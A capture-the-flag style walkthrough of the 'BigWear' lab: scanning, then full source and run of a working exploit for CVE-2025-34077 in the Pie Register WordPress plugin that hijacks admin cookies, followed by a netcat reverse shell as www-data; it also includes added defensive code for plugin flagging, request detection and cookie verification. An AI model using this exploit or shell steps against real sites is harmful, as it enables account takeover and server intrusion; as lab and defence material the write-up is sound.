BIGWEAR MACHINE
┌──(root㉿kali)-[/home/kali/Descargas]
└─# bash auto_deploy.sh bigwear.tar
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
┌──(root㉿kali)-[/home/kali]
└─# ping -c3 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.038 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.038 ms
64 bytes from 172.17.0.2: icmp_seq=3 ttl=64 time=0.062 ms
--- 172.17.0.2 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2031ms
rtt min/avg/max/mdev = 0.038/0.046/0.062/0.011 ms
Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed three open ports: 80 (Apache 2.4.52 serving a WordPress 6.9.4 site), 3000 (an unidentified HTTP service that returns a create-react-app page) and 8000 (a Python WSGIServer that answers with a 404 at /).
┌──(root㉿kali)-[/home/kali]
└─# nmap -n -Pn -p- --min-rate 5000 -sV -sC -sS -vvv 172.17.0.2
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-11 09:35 CEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
Initiating ARP Ping Scan at 09:35
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 09:35, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:35
Scanning 172.17.0.2 [65535 ports]
Discovered open port 80/tcp on 172.17.0.2
Discovered open port 3000/tcp on 172.17.0.2
Discovered open port 8000/tcp on 172.17.0.2
Completed SYN Stealth Scan at 09:35, 0.74s elapsed (65535 total ports)
Initiating Service scan at 09:35
Scanning 3 services on 172.17.0.2
Completed Service scan at 09:35, 11.09s elapsed (3 services on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 1.56s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.16s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.01s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000050s latency).
Scanned at 2026-04-11 09:35:19 CEST for 14s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.52 ((Ubuntu))
|_http-generator: WordPress 6.9.4
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-favicon: Unknown favicon MD5: 000BF649CC8F6BF27CFB04D1BCDCD3C7
|_http-title: BigWear WordPress
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
3000/tcp open ppp? syn-ack ttl 64
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Content-Length: 644
| Content-Disposition: inline; filename="index.html"
| Accept-Ranges: bytes
| ETag: "f28d0bf7364f5ff87825e15951852d784de5b81e"
| Content-Type: text/html; charset=utf-8
| Vary: Accept-Encoding
| Date: Sat, 11 Apr 2026 07:35:31 GMT
| Connection: close
| <!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="Web site created using create-react-app"/><link rel="apple-touch-icon" href="/logo192.png"/><link rel="manifest" href="/manifest.json"/><title>React App</title><script defer="defer" src="/static/js/main.49cf7e7a.js"></script><link href="/static/css/main.fdb74950.css" rel="stylesheet"></head><body><noscript>You need to enable JavaScript to run this app.</noscript><div id=
| Help, NCP:
| HTTP/1.1 400 Bad Request
|_ Connection: close
8000/tcp open http syn-ack ttl 64 WSGIServer 0.2 (Python 3.10.12)
|_http-title: Page not found at /
|_http-server-header: WSGIServer/0.2 CPython/3.10.12
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=4/11%Time=69D9F9C3%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,39F,"HTTP/1\.1\x20200\x20OK\r\nContent-Length:\x20644\r\nConte
SF:nt-Disposition:\x20inline;\x20filename=\"index\.html\"\r\nAccept-Ranges
SF::\x20bytes\r\nETag:\x20\"f28d0bf7364f5ff87825e15951852d784de5b81e\"\r\n
SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nVary:\x20Accept-Encodin
SF:g\r\nDate:\x20Sat,\x2011\x20Apr\x202026\x2007:35:31\x20GMT\r\nConnectio
SF:n:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><meta\x
SF:20charset=\"utf-8\"/><link\x20rel=\"icon\"\x20href=\"/favicon\.ico\"/><
SF:meta\x20name=\"viewport\"\x20content=\"width=device-width,initial-scale
SF:=1\"/><meta\x20name=\"theme-color\"\x20content=\"#000000\"/><meta\x20na
SF:me=\"description\"\x20content=\"Web\x20site\x20created\x20using\x20crea
SF:te-react-app\"/><link\x20rel=\"apple-touch-icon\"\x20href=\"/logo192\.p
SF:ng\"/><link\x20rel=\"manifest\"\x20href=\"/manifest\.json\"/><title>Rea
SF:ct\x20App</title><script\x20defer=\"defer\"\x20src=\"/static/js/main\.4
SF:9cf7e7a\.js\"></script><link\x20href=\"/static/css/main\.fdb74950\.css\
SF:"\x20rel=\"stylesheet\"></head><body><noscript>You\x20need\x20to\x20ena
SF:ble\x20JavaScript\x20to\x20run\x20this\x20app\.</noscript><div\x20id=")
SF:%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\
SF:r\n\r\n")%r(NCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x
SF:20close\r\n\r\n")%r(HTTPOptions,39F,"HTTP/1\.1\x20200\x20OK\r\nContent-
SF:Length:\x20644\r\nContent-Disposition:\x20inline;\x20filename=\"index\.
SF:html\"\r\nAccept-Ranges:\x20bytes\r\nETag:\x20\"f28d0bf7364f5ff87825e15
SF:951852d784de5b81e\"\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\n
SF:Vary:\x20Accept-Encoding\r\nDate:\x20Sat,\x2011\x20Apr\x202026\x2007:35
SF::31\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x20la
SF:ng=\"en\"><head><meta\x20charset=\"utf-8\"/><link\x20rel=\"icon\"\x20hr
SF:ef=\"/favicon\.ico\"/><meta\x20name=\"viewport\"\x20content=\"width=dev
SF:ice-width,initial-scale=1\"/><meta\x20name=\"theme-color\"\x20content=\
SF:"#000000\"/><meta\x20name=\"description\"\x20content=\"Web\x20site\x20c
SF:reated\x20using\x20create-react-app\"/><link\x20rel=\"apple-touch-icon\
SF:"\x20href=\"/logo192\.png\"/><link\x20rel=\"manifest\"\x20href=\"/manif
SF:est\.json\"/><title>React\x20App</title><script\x20defer=\"defer\"\x20s
SF:rc=\"/static/js/main\.49cf7e7a\.js\"></script><link\x20href=\"/static/c
SF:ss/main\.fdb74950\.css\"\x20rel=\"stylesheet\"></head><body><noscript>Y
SF:ou\x20need\x20to\x20enable\x20JavaScript\x20to\x20run\x20this\x20app\.<
SF:/noscript><div\x20id=");
MAC Address: FA:59:56:2B:C9:F7 (Unknown)
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.01s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.03 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Next, WPScan was run against the WordPress site to enumerate users and plugins. As shown below, it identified the pie-register plugin at version 3.7.1.4 (out of date; the latest is 3.8.4.9), which is the vulnerable component, and a single user, admin.
┌──(root㉿kali)-[/home/kali]
└─# wpscan --url "http://172.17.0.2:80/" -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://172.17.0.2/ [172.17.0.2]
[+] Started: Sat Apr 11 09:38:36 2026
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.52 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://172.17.0.2/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://172.17.0.2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://172.17.0.2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://172.17.0.2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.9.4 identified (Latest, released on 2026-03-11).
| Found By: Rss Generator (Passive Detection)
| - http://172.17.0.2/feed/, <generator>https://wordpress.org/?v=6.9.4</generator>
| - http://172.17.0.2/comments/feed/, <generator>https://wordpress.org/?v=6.9.4</generator>
[+] WordPress theme in use: twentytwentyfive
| Location: http://172.17.0.2/wp-content/themes/twentytwentyfive/
| Latest Version: 1.4 (up to date)
| Last Updated: 2025-12-03T00:00:00.000Z
| Readme: http://172.17.0.2/wp-content/themes/twentytwentyfive/readme.txt
| Style URL: http://172.17.0.2/wp-content/themes/twentytwentyfive/style.css
| Style Name: Twenty Twenty-Five
| Style URI: https://wordpress.org/themes/twentytwentyfive/
| Description: Twenty Twenty-Five emphasizes simplicity and adaptability. It offers flexible design options, suppor...
| Author: the WordPress team
| Author URI: https://wordpress.org
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://172.17.0.2/wp-content/themes/twentytwentyfive/style.css, Match: 'Version: 1.4'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] *
| Location: http://172.17.0.2/wp-content/plugins/*/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.
[+] pie-register
| Location: http://172.17.0.2/wp-content/plugins/pie-register/
| Last Updated: 2026-03-30T12:58:00.000Z
| [!] The version is out of date, the latest version is 3.8.4.9
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 3.7.1.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://172.17.0.2/wp-content/plugins/pie-register/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://172.17.0.2/wp-json/wp/v2/users/?per_page=100&page=1
| Rss Generator (Aggressive Detection)
| Author Sitemap (Aggressive Detection)
| - http://172.17.0.2/wp-sitemap-users-1.xml
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Apr 11 09:38:42 2026
[+] Requests Done: 57
[+] Cached Requests: 8
[+] Data Sent: 15.93 KB
[+] Data Received: 729.461 KB
[+] Memory used: 255.277 MB
[+] Elapsed time: 00:00:06
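The same check an asset owner would automate from the WPScan output above, as an added example that is not part of this write-up or of WPScan: a small parser for the "[i] Plugin(s) Identified" section and a version comparison against the range the exploit's help text names (pie-register <= 3.7.1.4). The excerpt fed to it is constructed from the output above.

```python
"""Parse WPScan's plugin findings and flag versions in an affected range.

Added example, not part of the write-up or of WPScan itself: a small parser
for the "[i] Plugin(s) Identified" section of the output above, plus a
version comparison against the range the exploit's help text names
(pie-register <= 3.7.1.4). The excerpt below is constructed from that output.
"""
import re

WPSCAN_EXCERPT = """\
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] *
 | Location: http://172.17.0.2/wp-content/plugins/*/
 |
 | The version could not be determined.
[+] pie-register
 | Location: http://172.17.0.2/wp-content/plugins/pie-register/
 | [!] The version is out of date, the latest version is 3.8.4.9
 |
 | Version: 3.7.1.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
[+] Enumerating Users (via Passive and Aggressive Methods)
"""

# slug -> (operator, bound). The pie-register bound is the "<= 3.7.1.4"
# stated in the exploit's description on this page.
AFFECTED = {"pie-register": ("<=", "3.7.1.4")}

PLUGIN_HEADER = re.compile(r"^\[\+\] (.+)$")
VERSION_LINE = re.compile(r"^\s*\|\s*Version:\s*(\d+(?:\.\d+)*)")


def parse_version(text):
    """'3.7.1.4' -> (3, 7, 1, 4); tuples compare component by component."""
    return tuple(int(p) for p in text.split("."))


def parse_wpscan_plugins(output):
    """Return {slug: version or None} for the plugins WPScan identified."""
    plugins, current, in_section = {}, None, False
    for line in output.splitlines():
        if line.startswith("[i] Plugin(s) Identified"):
            in_section = True
            continue
        if not in_section:
            continue
        header = PLUGIN_HEADER.match(line)
        if header:
            slug = header.group(1)
            if " " in slug:          # next section ("[+] Enumerating Users ..."): stop
                break
            current, plugins[slug] = slug, None
            continue
        version = VERSION_LINE.match(line)
        if version and current:
            plugins[current] = version.group(1)
    return plugins


def flag_vulnerable(plugins, affected=AFFECTED):
    """Return {slug: version} for detected versions inside an affected range."""
    flagged = {}
    for slug, version in plugins.items():
        if version is None or slug not in affected:
            continue                 # unknown version: cannot decide, report separately
        op, bound = affected[slug]
        detected, limit = parse_version(version), parse_version(bound)
        if (op == "<=" and detected <= limit) or (op == "<" and detected < limit):
            flagged[slug] = version
    return flagged


if __name__ == "__main__":
    found = parse_wpscan_plugins(WPSCAN_EXCERPT)
    for slug, version in found.items():
        print(f"{slug}: {version or 'version unknown'}")
    for slug, version in flag_vulnerable(found).items():
        op, bound = AFFECTED[slug]
        print(f"[!] {slug} {version} is in the affected range ({op} {bound})")
```

WPScan reports the pie-register version from the readme's stable tag at 80% confidence, so a version of None (the "*" entry above) is deliberately not treated as safe; an inventory job should list those separately rather than silently passing them.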
Now let's look at what this exploit (pie.py) does, as shown below.
┌──(root㉿kali)-[/home/kali]
└─# cat pie.py
#!/usr/bin/env python3
import requests
import sys

BANNER = r"""
_______ ________ ___ ___ ___ _____ ____ _ _ ___ ______ ______
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |___ \| || | / _ \____ |____ |
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ __) | || |_| | | | / / / /
| | \ \/ / | __| |______| / /| | | |/ /|___ \ |______| |__ <|__ _| | | | / / / /
| |____ \ / | |____ / /_| |_| / /_ ___) | ___) | | | | |_| |/ / / /
\_____| \/ |______| |____|\___/____|____/ |____/ |_| \___//_/ /_/
by Mrj Haxcore | CVE-2025-34077
"""

HELP = """
Usage:
    python3 pie.py <http://target.site>

Description:
    This script exploits an unauthenticated admin session hijack vulnerability
    in the Pie Register WordPress plugin <= 3.7.1.4 to steal admin cookies.

Options:
    -h, --help    Show this help message and exit
"""


def main():
    print(BANNER)
    if len(sys.argv) < 2 or sys.argv[1] in ['-h', '--help']:
        print(HELP)
        sys.exit(0)

    target = sys.argv[1].rstrip('/')
    login_url = f"{target}/"
    headers = {
        "User-Agent": "Mozilla/5.0 (PoC Exploit for CVE-2025-34077)"
    }
    # Form fields of the plugin's social-login flow; the user id is taken
    # from the client without any authentication.
    data = {
        "user_id_social_site": "1",  # Admin ID
        "social_site": "true",
        "piereg_login_after_registration": "true",
        "_wp_http_referer": "/login/",
        "log": "null",
        "pwd": "null"
    }

    print("[*] Sending payload to hijack admin session...")
    try:
        resp = requests.post(login_url, data=data, headers=headers, allow_redirects=False)
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        sys.exit(1)

    # A vulnerable target answers with Set-Cookie headers for the requested user.
    cookies = resp.cookies.get_dict()
    if cookies:
        print("\n[+] Successfully hijacked cookies for user_id=1 (admin):")
        for k, v in cookies.items():
            print(f"    {k} = {v}")
        print("\n[!] Use these cookies in your browser or tools like curl or Burp to act as admin.")
    else:
        print("[-] Failed to get any cookies. Target may be patched or not vulnerable.")
        print(f"[i] HTTP Status: {resp.status_code}")
        print(f"[i] Response Headers: {resp.headers}")


if __name__ == "__main__":
    main()
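From the defender's side, the request pie.py sends has a very recognisable shape. The following is an added example, not part of this write-up or of the exploit: a rule a reverse proxy or audit hook could apply to each incoming request. Requests are constructed dicts (method, path, form fields, headers, and an "authenticated" flag meaning a valid wordpress_logged_in_ cookie was presented, which is an assumption about how the proxy is wired); the field names and User-Agent string come from the exploit above.

```python
"""Flag HTTP requests matching the CVE-2025-34077 PoC pattern shown above.

Added example, not part of the write-up or of pie.py: a small rule that a
WAF, reverse proxy or audit hook could apply. Each request is a constructed
dict; "authenticated" stands for "a valid wordpress_logged_in_ cookie was
presented" (an assumption about the proxy). Field names come from the
exploit's payload above, the User-Agent string from its headers.
"""

POC_USER_AGENT = "PoC Exploit for CVE-2025-34077"                  # substring of the UA pie.py sends
SOCIAL_LOGIN_FIELDS = {"user_id_social_site", "social_site"}       # key fields of the payload

# Constructed sample traffic: the PoC request, a normal wp-login POST and a GET.
SAMPLE_REQUESTS = [
    {
        "method": "POST", "path": "/",
        "form": {"user_id_social_site": "1", "social_site": "true",
                 "piereg_login_after_registration": "true",
                 "_wp_http_referer": "/login/", "log": "null", "pwd": "null"},
        "headers": {"User-Agent": "Mozilla/5.0 (PoC Exploit for CVE-2025-34077)"},
        "authenticated": False,
    },
    {
        "method": "POST", "path": "/wp-login.php",
        "form": {"log": "editor", "pwd": "correct horse battery staple"},
        "headers": {"User-Agent": "Mozilla/5.0"},
        "authenticated": False,
    },
    {
        "method": "GET", "path": "/",
        "form": {},
        "headers": {"User-Agent": "Mozilla/5.0"},
        "authenticated": False,
    },
]


def classify_request(req):
    """Return the reasons a request looks like the PoC (empty list = clean)."""
    reasons = []
    form = req.get("form") or {}
    ua = (req.get("headers") or {}).get("User-Agent", "")

    # Weak signal: the published PoC identifies itself. Trivial to change,
    # so it is only a tell for unmodified copies.
    if POC_USER_AGENT in ua:
        reasons.append("User-Agent matches the published PoC")

    # Strong signal: an unauthenticated client asserting which user id the
    # social-login flow should log in. A server must never trust a
    # client-supplied user id for login, so this pattern is always suspect.
    if (req.get("method") == "POST"
            and SOCIAL_LOGIN_FIELDS <= set(form)
            and form.get("social_site", "").lower() == "true"
            and not req.get("authenticated", False)):
        reasons.append(
            f"unauthenticated social-login POST asserting user_id={form['user_id_social_site']}")
    return reasons


def audit(requests_):
    """Map request index -> findings, keeping only the flagged requests."""
    return {i: reasons for i, req in enumerate(requests_)
            if (reasons := classify_request(req))}


if __name__ == "__main__":
    for index, reasons in audit(SAMPLE_REQUESTS).items():
        print(f"request #{index}: " + "; ".join(reasons))
```

The real fix is the plugin update (the scan shows 3.7.1.4 installed against a latest of 3.8.4.9); a rule like this only buys time until that is applied, and the form-field check, not the User-Agent, is the part worth keeping.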
Let's run the exploit with python3 pie.py http://172.17.0.2, as shown below.
┌──(root㉿kali)-[/home/kali]
└─# python3 pie.py http://172.17.0.2
_______ ________ ___ ___ ___ _____ ____ _ _ ___ ______ ______
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |___ \| || | / _ \____ |____ |
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ __) | || |_| | | | / / / /
| | \ \/ / | __| |______| / /| | | |/ /|___ \ |______| |__ <|__ _| | | | / / / /
| |____ \ / | |____ / /_| |_| / /_ ___) | ___) | | | | |_| |/ / / /
\_____| \/ |______| |____|\___/____|____/ |____/ |_| \___//_/ /_/
by Mrj Haxcore | CVE-2025-34077
[*] Sending payload to hijack admin session...
[+] Successfully hijacked cookies for user_id=1 (admin):
wordpress_a2a379b8590d3431d7153bb3b68da0df = admin%7C1776066114%7ClANm1m33v52nXeb4u03x22CjkjjTBNSd2QcAvON9FBi%7C28bc48a49d7e46b9f8c1211c5f177a92d45732795f41256737c96900f0ae6a96
wordpress_logged_in_a2a379b8590d3431d7153bb3b68da0df = admin%7C1776066114%7ClANm1m33v52nXeb4u03x22CjkjjTBNSd2QcAvON9FBi%7C2fc944bf2d21fba96e0f1c05b15e87c56d81623f1188d78468b3885efbd818c3
[!] Use these cookies in your browser or tools like curl or Burp to act as admin.
When we add the first cookie returned by the exploit to the browser
wordpress_a2a379b8590d3431d7153bb3b68da0df = admin%7C1776066114%7ClANm1m33v52nXeb4u03x22CjkjjTBNSd2QcAvON9FBi%7C28bc48a49d7e46b9f8c1211c5f177a92d45732795f41256737c96900f0ae6a96
and set the logged-in cookie the same way:
wordpress_logged_in_a2a379b8590d3431d7153bb3b68da0df = admin%7C1776066114%7ClANm1m33v52nXeb4u03x22CjkjjTBNSd2QcAvON9FBi%7C2fc944bf2d21fba96e0f1c05b15e87c56d81623f1188d78468b3885efbd818c3
we are logged in as admin, the site's administrator, without knowing the password.
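What those two cookie values actually carry, as an added example that is not part of this write-up: a WordPress auth cookie is username|expiration|token|hmac (URL-encoded, so "|" shows up as %7C). The parser below decodes the hijacked wordpress_logged_in_ value and reports who it asserts and when it expires, and verify_auth_cookie re-implements in Python the signing step of WordPress's wp_generate_auth_cookie (HMAC-MD5 key derivation from the scheme salt and a four-character fragment of the stored password hash, then HMAC-SHA256 over username|expiration|token). The salt and password hash used to demonstrate verification are constructed values, not the lab's.

```python
"""Decode and verify WordPress auth cookies like the two returned above.

Added example, not part of the write-up. Cookie layout and signing scheme
follow WordPress core (wp_generate_auth_cookie / wp_validate_auth_cookie);
SALT and PASS_HASH below are constructed, not the lab's secrets.
"""
import hashlib
import hmac
from datetime import datetime, timezone
from urllib.parse import unquote

# The wordpress_logged_in_* cookie value printed by the exploit above.
HIJACKED_COOKIE = ("admin%7C1776066114%7ClANm1m33v52nXeb4u03x22CjkjjTBNSd2QcAvON9FBi"
                   "%7C2fc944bf2d21fba96e0f1c05b15e87c56d81623f1188d78468b3885efbd818c3")


def parse_auth_cookie(value):
    """Split a WordPress auth cookie into its four fields."""
    parts = unquote(value).split("|")
    if len(parts) != 4:
        raise ValueError("expected username|expiration|token|hmac")
    user, expiration, token, mac = parts
    exp = int(expiration)
    return {
        "user": user,
        "expiration": exp,
        "expires_at": datetime.fromtimestamp(exp, tz=timezone.utc).isoformat(),
        "token": token,   # session token; must also exist in the user's stored sessions
        "hmac": mac,
    }


def is_expired(fields, now_epoch):
    """True once the expiration timestamp has passed (WordPress rejects the cookie then)."""
    return fields["expiration"] < int(now_epoch)


def wp_hash(data, salt):
    """WordPress wp_hash(): HMAC-MD5 of data keyed with the scheme salt."""
    return hmac.new(salt.encode(), data.encode(), hashlib.md5).hexdigest()


def generate_auth_cookie(user, user_pass_hash, expiration, token, salt):
    """Python port of wp_generate_auth_cookie's signing step."""
    pass_frag = user_pass_hash[8:12]                       # substr($user_pass, 8, 4)
    key = wp_hash(f"{user}|{pass_frag}|{expiration}|{token}", salt)
    mac = hmac.new(key.encode(), f"{user}|{expiration}|{token}".encode(),
                   hashlib.sha256).hexdigest()
    return f"{user}|{expiration}|{token}|{mac}"


def verify_auth_cookie(value, user_pass_hash, salt):
    """Recompute the HMAC and compare in constant time, as wp_validate_auth_cookie does."""
    f = parse_auth_cookie(value)
    expected = generate_auth_cookie(f["user"], user_pass_hash, f["expiration"], f["token"], salt)
    return hmac.compare_digest(expected.split("|")[3], f["hmac"])


if __name__ == "__main__":
    f = parse_auth_cookie(HIJACKED_COOKIE)
    print(f"cookie asserts user={f['user']} until {f['expires_at']} (token {f['token'][:8]}...)")
    # Constructed secret material: a correctly signed cookie verifies, a tampered one does not.
    SALT, PASS_HASH = "constructed-salt", "$P$BconstructedHashXXXXXXXXXXXXXXXX"
    good = generate_auth_cookie("admin", PASS_HASH, f["expiration"], f["token"], SALT)
    print("signed cookie verifies:", verify_auth_cookie(good, PASS_HASH, SALT))
    print("user-swapped cookie verifies:",
          verify_auth_cookie(good.replace("admin|", "editor|", 1), PASS_HASH, SALT))
```

The expiry decodes to 2026-04-13T07:41:54+00:00, two days after the exploit ran, which is WordPress's default cookie lifetime. The point for incident response is that these cookies are not forged: the plugin made WordPress mint a perfectly valid session for user id 1, so signature checks pass. What invalidates them is destroying the admin user's sessions (the token field must match a stored session) or rotating the keys and salts in wp-config.php, which voids every cookie on the site, and of course updating the plugin so it cannot be re-issued.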
With administrator access to WordPress we can now get a reverse shell in two steps:
1. Create the reverse shell payload.
2. Start a listener with nc -lvp 4444, as shown below, and wait for the connection; the shell comes back as www-data.
┌──(root㉿kali)-[/home/kali]
└─# nc -lvp 4444
listening on [any] 4444 ...
172.17.0.2: inverse host lookup failed: Unknown host
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 36042
Linux 68538d56bfc8 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64 x86_64 x86_64 GNU/Linux
08:05:59 up 1:13, 0 users, load average: 0.40, 0.82, 0.87
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ $ whoami
www-data
$ ls -la
total 72
drwxr-xr-x 1 root root 4096 Apr 11 07:32 .
drwxr-xr-x 1 root root 4096 Apr 11 07:32 ..
-rwxr-xr-x 1 root root 0 Apr 11 07:32 .dockerenv
lrwxrwxrwx 1 root root 7 Feb 17 04:45 bin -> usr/bin
drwxr-xr-x 2 root root 4096 Apr 18 2022 boot
drwxr-xr-x 5 root root 340 Apr 11 07:32 dev
drwxr-xr-x 1 root root 4096 Apr 11 07:32 etc
drwxr-xr-x 2 root root 4096 Apr 18 2022 home
lrwxrwxrwx 1 root root 7 Feb 17 04:45 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Feb 17 04:45 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Feb 17 04:45 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Feb 17 04:45 libx32 -> usr/libx32
drwxr-xr-x 2 root root 4096 Feb 17 04:45 media
drwxr-xr-x 2 root root 4096 Feb 17 04:45 mnt
drwxr-xr-x 1 root root 4096 Mar 23 14:29 opt
dr-xr-xr-x 309 root root 0 Apr 11 07:32 proc
drwx------ 1 root root 4096 Mar 23 14:28 root
drwxr-xr-x 1 root root 4096 Apr 11 07:35 run
lrwxrwxrwx 1 root root 8 Feb 17 04:45 sbin -> usr/sbin
drwxr-xr-x 2 root root 4096 Feb 17 04:45 srv
dr-xr-xr-x 13 root root 0 Apr 11 07:32 sys
drwxrwxrwt 1 root root 4096 Apr 11 08:03 tmp
drwxr-xr-x 1 root root 4096 Feb 17 04:45 usr
drwxr-xr-x 1 root root 4096 Mar 23 13:46 var
$ sudo -l
sh: 3: sudo: not found
$ clear
TERM environment variable not set.
$ cd /usr
$ clear
TERM environment variable not set.
$ ls
bin
games
include
lib
lib32
lib64
libexec
libx32
local
sbin
share
src
$ cd ..
$ cd /home
$ ls
$ cd ..
$ ls
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cd /opt
$ ls
bigwear
diagnose.sh
init-wordpress.sh
start-services.sh
$ cd bigwear
$ ls
backend
frontend
media
$ cd frontend
$ ls
README.md
build
node_modules
package-lock.json
package.json
public
src
